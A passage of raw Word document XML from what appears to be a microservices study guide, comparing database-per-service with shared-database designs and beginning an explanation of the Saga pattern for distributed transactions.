        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC8740"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ervices are tightly coupled via the shared database, which can make it harder to scale, evolve, and deploy services independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D7E57"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Changes to the database schema can affect all services that rely on it, leading to coordination overhead when changes are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61048C25"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Single Point of Failure</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06815EA8"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If the database goes down, it can bring down all services that rely on it. This creates a single point of failure, affecting the availability of the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C190622"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Performance Bottleneck</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570D1B8B"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Having all services access the same database can lead to contention and performance issues, especially when multiple services access the database simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE6917E"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caling the database to meet the needs of multiple services can be difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24685B21"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Reduced Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527CB7FC"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All services are tied to the same database technology and schema. If one service requires a different database type (e.g., NoSQL), it becomes difficult to introduce without affecting others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB24D4"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Difficulty in Autonomous Evolution</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B08A2B"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ince all services are tied to the same database schema, any changes to the database schema could impact multiple services. This makes it hard to evolve services independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB17374" w14:textId="77777777" w:rsidR="00D056EB"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906C1D">
          <v:rect id="_x0000_i2808" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA70F31"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When to Use Each Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FEB3C6"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Database per Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is preferred when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B439F20"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lastRenderedPageBreak/>
        <w:t>You need full autonomy between microservices, especially when services are loosely coupled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3C738E"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Each service has different data storage needs (e.g., some services need SQL, others need NoSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629DBC4"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You want to scale services independently without affecting others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0A520"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You can tolerate the complexity of managing multiple databases and eventual consistency between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B9BEE"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Shared Database</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is preferred when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5309FB76"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You want to minimize the complexity of managing multiple databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4100BD67"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The services are highly interdependent, and tight data consistency is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546EE299"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You have a relatively small system or a monolithic application that’s being refactored into microservices, and you don’t need the overhead of managing separate databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF7DAAE" w14:textId="77777777" w:rsidR="00D056EB"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7905845">
          <v:rect id="_x0000_i2809" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D098D"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9"/>
        <w:gridCol w:w="3997"/>
        <w:gridCol w:w="4698"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="07D7706A" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB40C83"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6250D075"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Database per Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="515A14A9"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Shared Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="52636370" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F003DE4"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Coupling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7753342F"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Loose coupling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E05DFB1"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Tight coupling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="515F1890" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EAAD3B"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Scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B049FB4"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calable, services can be scaled independently</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B6F8C1E"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Difficult to scale as a whole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="4F2A1541" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="483E38F5"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Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="161BF762"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Eventual consistency, complex transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EE1F0D"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trong consistency (ACID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="5FADE34D" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7E4F28"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Flexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34AF84A1"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High flexibility, independent database choice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C7FD8D3"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Less flexibility (shared technology)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="4944469F" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF5FA35"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Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="738C990B"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More complex to manage, more overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73D83A5F"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impler to manage, but limited scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="7E95A773" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B562231"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Failure Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126AA93D"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High fault tolerance (failures isolated to a service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20EB512B"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ingle point of failure (database downtime impacts all services)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="1D2ED22A" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E45D5E5"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Data Duplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="682B9A6A"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Potential for data duplication across services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BCFC7BF"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No duplication, centralized data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="2CDEA2F6" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28415EC4"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Autonomy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EDD3FF2"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Each service has its own database, fully autonomous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38EB1057"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ervices are tightly coupled via shared DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="741E8A89" w14:textId="77777777" w:rsidR="00D056EB"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9730B4">
          <v:rect id="_x0000_i2810" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B59B6F"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C18E04C"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Database per Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is ideal for microservices where you need full autonomy, scalability, and flexibility to choose the best database for each service. However, it introduces complexity in managing data consistency and handling inter-service communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01617777"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Shared Database</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is better for simpler applications or systems where tight consistency and simpler management are prioritized over flexibility and scaling. However, it brings the challenge of tightly coupling services and limiting their ability to evolve independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA33C8E" w14:textId="7AD7A9E3" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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C17745C">
          <v:rect id="_x0000_i2811" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27B442" w14:textId="7BB95433" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="004B7F50">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="681" w:name="_Toc196308161"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Saga Pattern for distributed transactions in microservices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="681"/>
    </w:p>
    <w:p w14:paraId="6AFA3E37" w14:textId="3E1943C5" w:rsidR="00D056EB" w:rsidRPr="008B3EF9" w:rsidRDefault="00D056EB" w:rsidP="008B3EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Saga Pattern for Distributed Transactions in Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D31BE7E"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In a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, each service typically manages its own database, and services often need to work together to complete a business transaction. However, in such a distributed environment, maintaining </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACID (Atomicity, Consistency, Isolation, Durability)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> properties across services is difficult due to the absence of a single, centralized database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18659AA7"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saga Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a solution to manage distributed transactions in microservices, ensuring that the system can remain in a consistent state even when failures occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEAB8F6" w14:textId="77777777" w:rsidR="00D056EB"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214F5D">
          <v:rect id="_x0000_i2812" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C66300"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What is the Saga Pattern?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0C23B"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The Saga Pattern divides a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a series of smaller, isolated transactions, each executed by a single service. These smaller transactions are called </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>saga steps</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>saga operations</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and they are coordinated by a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>saga orchestrator</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (centralized or decentralized). If a step in the saga fails, the pattern defines how compensating transactions (rollback) are performed to maintain data consistency and integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB812FF" w14:textId="77777777" w:rsidR="00D056EB"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EE4E05">
          <v:rect id="_x0000_i2813" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD9802"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Types of Saga Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D3042"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Choreography-Based Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB14246"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No central coordinator</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each service knows about its responsibilities and when to execute a compensating transaction if something goes wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7748394A"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lastRenderedPageBreak/>
        <w:t>Event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Services publish events that other services listen to, and they execute their tasks when the appropriate event occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CABF20"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In an order processing system, after a payment is completed, the payment service publishes an event (PaymentProcessed). The shipping service listens for this event and starts shipping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512F031"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Orchestration-Based Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429538CE"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Central coordinator (Saga Orchestrator)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A central service or a component directs the flow of the saga. It makes decisions on whether to proceed with the next step or trigger compensating actions if any step fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B108BB"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Explicit control</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The orchestrator decides the sequence of steps and handles the failure scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA8DC3B"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
